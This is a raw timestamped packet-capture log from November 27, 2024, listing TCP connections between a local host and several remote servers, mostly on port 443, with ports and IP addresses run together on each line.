                                    Nov 27, 2024 23:06:43.772928953 CET4434972035.190.80.1192.168.2.16
                                    Nov 27, 2024 23:06:43.848576069 CET44349717172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:43.848840952 CET49717443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:43.848856926 CET44349717172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:43.849894047 CET44349717172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:43.849955082 CET49717443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:43.850322008 CET49717443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:43.850339890 CET49717443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:43.850383043 CET44349717172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:43.850394011 CET49717443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:43.850430965 CET49717443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:43.850688934 CET49721443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:43.850729942 CET44349721172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:43.850797892 CET49721443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:43.850980043 CET49721443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:43.850995064 CET44349721172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:44.417088985 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:44.417373896 CET49719443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:44.417392969 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:44.418281078 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:44.418343067 CET49719443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:44.418654919 CET49719443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:44.418710947 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:44.419837952 CET49719443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:44.419850111 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:44.461767912 CET4434971823.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:44.461838007 CET49718443192.168.2.1623.218.208.109
                                    Nov 27, 2024 23:06:44.465977907 CET49718443192.168.2.1623.218.208.109
                                    Nov 27, 2024 23:06:44.465987921 CET4434971823.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:44.466209888 CET4434971823.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:44.466749907 CET49719443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:44.509758949 CET49718443192.168.2.1623.218.208.109
                                    Nov 27, 2024 23:06:44.555336952 CET4434971823.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:44.833067894 CET49678443192.168.2.1620.189.173.10
                                    Nov 27, 2024 23:06:44.991549969 CET4434972035.190.80.1192.168.2.16
                                    Nov 27, 2024 23:06:44.992069960 CET49720443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:06:44.992088079 CET4434972035.190.80.1192.168.2.16
                                    Nov 27, 2024 23:06:44.992407084 CET4434972035.190.80.1192.168.2.16
                                    Nov 27, 2024 23:06:44.992743015 CET49720443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:06:44.992799997 CET4434972035.190.80.1192.168.2.16
                                    Nov 27, 2024 23:06:44.992901087 CET49720443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:06:44.994000912 CET4434971823.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:44.994055986 CET4434971823.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:44.994112968 CET49718443192.168.2.1623.218.208.109
                                    Nov 27, 2024 23:06:44.994219065 CET49718443192.168.2.1623.218.208.109
                                    Nov 27, 2024 23:06:44.994235039 CET4434971823.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:44.994245052 CET49718443192.168.2.1623.218.208.109
                                    Nov 27, 2024 23:06:44.994251013 CET4434971823.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:45.026633024 CET49722443192.168.2.1623.218.208.109
                                    Nov 27, 2024 23:06:45.026676893 CET4434972223.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:45.026880026 CET49722443192.168.2.1623.218.208.109
                                    Nov 27, 2024 23:06:45.027060986 CET49722443192.168.2.1623.218.208.109
                                    Nov 27, 2024 23:06:45.027081966 CET4434972223.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:45.039366007 CET4434972035.190.80.1192.168.2.16
                                    Nov 27, 2024 23:06:45.119740963 CET44349721172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.121809006 CET49721443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:45.121838093 CET44349721172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.122843027 CET44349721172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.122936010 CET49721443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:45.123200893 CET49721443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:45.123260975 CET44349721172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.123333931 CET49721443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:45.123342037 CET44349721172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.134753942 CET49678443192.168.2.1620.189.173.10
                                    Nov 27, 2024 23:06:45.166774035 CET49721443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:45.227289915 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.227334023 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.227405071 CET49719443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:45.227418900 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.227524996 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.227575064 CET49719443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:45.227586985 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.230894089 CET49721443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:45.230959892 CET44349721172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.231131077 CET44349721172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.231198072 CET49721443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:45.231198072 CET49721443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:45.235686064 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.235841036 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.235903978 CET49719443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:45.235913038 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.237971067 CET49719443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:45.244400978 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.244630098 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.244705915 CET49719443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:45.244714022 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.244725943 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.244777918 CET49719443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:45.245022058 CET49719443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:45.245037079 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:45.374433041 CET49723443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:06:45.374490023 CET443497234.175.87.197192.168.2.16
                                    Nov 27, 2024 23:06:45.374588966 CET49723443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:06:45.375637054 CET49723443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:06:45.375657082 CET443497234.175.87.197192.168.2.16
                                    Nov 27, 2024 23:06:45.385325909 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:45.385351896 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:45.385420084 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:45.385627985 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:45.385644913 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:45.463413000 CET4434972035.190.80.1192.168.2.16
                                    Nov 27, 2024 23:06:45.463799953 CET49720443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:06:45.463839054 CET4434972035.190.80.1192.168.2.16
                                    Nov 27, 2024 23:06:45.463896990 CET49720443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:06:45.739773035 CET49678443192.168.2.1620.189.173.10
                                    Nov 27, 2024 23:06:46.021740913 CET49673443192.168.2.16204.79.197.203
                                    Nov 27, 2024 23:06:46.457866907 CET4434972223.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:46.457957983 CET49722443192.168.2.1623.218.208.109
                                    Nov 27, 2024 23:06:46.473006964 CET49722443192.168.2.1623.218.208.109
                                    Nov 27, 2024 23:06:46.473084927 CET4434972223.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:46.473498106 CET4434972223.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:46.474571943 CET49722443192.168.2.1623.218.208.109
                                    Nov 27, 2024 23:06:46.515362024 CET4434972223.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:46.653414965 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:46.653726101 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:46.653752089 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:46.654606104 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:46.654695034 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:46.659048080 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:46.659107924 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:46.659216881 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:46.659230947 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:46.707792997 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:46.947763920 CET49678443192.168.2.1620.189.173.10
                                    Nov 27, 2024 23:06:46.993259907 CET4434972223.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:46.993318081 CET4434972223.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:46.993458033 CET49722443192.168.2.1623.218.208.109
                                    Nov 27, 2024 23:06:46.994128942 CET49722443192.168.2.1623.218.208.109
                                    Nov 27, 2024 23:06:46.994153976 CET4434972223.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:46.994168043 CET49722443192.168.2.1623.218.208.109
                                    Nov 27, 2024 23:06:46.994174957 CET4434972223.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:47.100452900 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.100518942 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.100611925 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.100631952 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.100671053 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.100749969 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.100759029 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.109273911 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.109349966 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.109359026 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.117717028 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.117819071 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.117825985 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.126744986 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.126882076 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.126889944 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.171770096 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.171780109 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.202662945 CET443497234.175.87.197192.168.2.16
                                    Nov 27, 2024 23:06:47.202788115 CET49723443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:06:47.208188057 CET49723443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:06:47.208208084 CET443497234.175.87.197192.168.2.16
                                    Nov 27, 2024 23:06:47.208483934 CET443497234.175.87.197192.168.2.16
                                    Nov 27, 2024 23:06:47.219760895 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.224189043 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.251733065 CET49723443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:06:47.266431093 CET49723443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:06:47.267760992 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.307359934 CET443497234.175.87.197192.168.2.16
                                    Nov 27, 2024 23:06:47.348635912 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.348644018 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.348680973 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.348699093 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.348710060 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.348740101 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.348756075 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.348788023 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.348875046 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.503081083 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.503089905 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.503129959 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.503144979 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.503175974 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.503186941 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.503237963 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.534149885 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.534157991 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.534199953 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.534228086 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.534233093 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.534252882 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.534284115 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.534310102 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.568604946 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.568624020 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.568681955 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.568691969 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.568758011 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.583502054 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.583570004 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.583585978 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.583625078 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.583914995 CET49724443192.168.2.16151.101.194.137
                                    Nov 27, 2024 23:06:47.583936930 CET44349724151.101.194.137192.168.2.16
                                    Nov 27, 2024 23:06:47.608529091 CET49725443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:47.608591080 CET44349725172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:47.608704090 CET49725443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:47.609057903 CET49725443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:47.609082937 CET44349725172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:47.731926918 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:47.731960058 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:47.732131004 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:47.732512951 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:47.732528925 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:47.769803047 CET49727443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:47.769846916 CET44349727185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:47.769921064 CET49727443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:47.769951105 CET49728443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:47.769958019 CET44349728185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:47.770019054 CET49728443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:47.770153046 CET49727443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:47.770168066 CET44349727185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:47.770292044 CET49728443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:47.770303965 CET44349728185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:47.927005053 CET443497234.175.87.197192.168.2.16
                                    Nov 27, 2024 23:06:47.927032948 CET443497234.175.87.197192.168.2.16
                                    Nov 27, 2024 23:06:47.927041054 CET443497234.175.87.197192.168.2.16
                                    Nov 27, 2024 23:06:47.927051067 CET443497234.175.87.197192.168.2.16
                                    Nov 27, 2024 23:06:47.927082062 CET443497234.175.87.197192.168.2.16
                                    Nov 27, 2024 23:06:47.927112103 CET49723443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:06:47.927130938 CET443497234.175.87.197192.168.2.16
                                    Nov 27, 2024 23:06:47.927143097 CET49723443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:06:47.927182913 CET49723443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:06:47.948461056 CET443497234.175.87.197192.168.2.16
                                    Nov 27, 2024 23:06:47.948537111 CET443497234.175.87.197192.168.2.16
                                    Nov 27, 2024 23:06:47.948554039 CET49723443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:06:47.948589087 CET49723443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:06:47.948676109 CET49723443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:06:47.948698044 CET443497234.175.87.197192.168.2.16
                                    Nov 27, 2024 23:06:47.948710918 CET49723443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:06:47.948724031 CET443497234.175.87.197192.168.2.16
                                    Nov 27, 2024 23:06:48.919778109 CET44349725172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:48.920574903 CET49725443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:48.920605898 CET44349725172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:48.921478033 CET44349725172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:48.921596050 CET49725443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:48.921914101 CET49725443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:48.921914101 CET49725443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:48.921972990 CET44349725172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:48.922002077 CET49725443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:48.922113895 CET44349725172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:48.922178984 CET49725443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:48.922178984 CET49725443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:48.922291994 CET49729443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:48.922344923 CET44349729172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:48.922617912 CET49729443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:48.922617912 CET49729443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:48.922650099 CET44349729172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:49.308945894 CET4968080192.168.2.16192.229.211.108
                                    Nov 27, 2024 23:06:49.356764078 CET49678443192.168.2.1620.189.173.10
                                    Nov 27, 2024 23:06:49.358722925 CET44349727185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:49.358942986 CET49727443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:49.358963013 CET44349727185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:49.360018015 CET44349727185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:49.360116005 CET49727443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:49.360125065 CET44349727185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:49.360171080 CET49727443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:49.361062050 CET49727443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:49.361123085 CET44349727185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:49.361232996 CET49727443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:49.361241102 CET44349727185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:49.404756069 CET49727443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:49.611774921 CET4968080192.168.2.16192.229.211.108
                                    Nov 27, 2024 23:06:49.885188103 CET44349727185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:49.885240078 CET44349727185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:49.885286093 CET49727443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:49.886054993 CET49727443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:49.886077881 CET44349727185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:50.031761885 CET49730443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:50.031794071 CET44349730185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:50.031872034 CET49730443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:50.032073021 CET49730443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:50.032088041 CET44349730185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:50.187997103 CET44349729172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:50.188299894 CET49729443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:50.188325882 CET44349729172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:50.188652039 CET44349729172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:50.189065933 CET49729443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:50.189127922 CET44349729172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:50.189232111 CET49729443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:50.219786882 CET4968080192.168.2.16192.229.211.108
                                    Nov 27, 2024 23:06:50.235342026 CET44349729172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:50.644880056 CET44349729172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:50.644957066 CET44349729172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:50.645071030 CET49729443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:50.645493984 CET49729443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:50.645512104 CET44349729172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:51.283906937 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:51.286699057 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:51.286722898 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:51.287597895 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:51.287674904 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:51.287935019 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:51.287983894 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:51.288064957 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:51.335336924 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:51.336410046 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:51.336430073 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:51.383757114 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:51.431796074 CET4968080192.168.2.16192.229.211.108
                                    Nov 27, 2024 23:06:51.522265911 CET44349730185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:51.522500992 CET49730443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:51.522527933 CET44349730185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:51.523418903 CET44349730185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:51.523490906 CET49730443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:51.523500919 CET44349730185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:51.523538113 CET49730443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:51.523806095 CET49730443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:51.523863077 CET44349730185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:51.523964882 CET49730443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:51.571338892 CET44349730185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:51.576195955 CET49730443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:51.576210022 CET44349730185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:51.622759104 CET49730443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:51.762025118 CET44349728185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:51.762301922 CET49728443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:51.762331009 CET44349728185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:51.763215065 CET44349728185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:51.763284922 CET49728443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:51.763293982 CET44349728185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:51.763330936 CET49728443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:51.763575077 CET49728443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:51.763638973 CET44349728185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:51.763729095 CET49728443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:51.807336092 CET44349728185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:51.814749002 CET49728443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:51.814762115 CET44349728185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:51.860028982 CET44349713142.250.181.68192.168.2.16
                                    Nov 27, 2024 23:06:51.860075951 CET44349713142.250.181.68192.168.2.16
                                    Nov 27, 2024 23:06:51.860181093 CET49713443192.168.2.16142.250.181.68
                                    Nov 27, 2024 23:06:51.863300085 CET49728443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:52.186100006 CET44349730185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:52.186161041 CET44349730185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:52.186310053 CET49730443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:52.186938047 CET49730443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:52.186954021 CET44349730185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:52.189271927 CET49713443192.168.2.16142.250.181.68
                                    Nov 27, 2024 23:06:52.189292908 CET44349713142.250.181.68192.168.2.16
                                    Nov 27, 2024 23:06:52.321404934 CET44349728185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:52.321429014 CET44349728185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:52.321459055 CET44349728185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:52.321476936 CET44349728185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:52.321515083 CET49728443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:52.321571112 CET49728443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:52.322559118 CET49728443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:52.322570086 CET44349728185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:52.325625896 CET49731443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:52.325654984 CET44349731185.15.58.240192.168.2.16
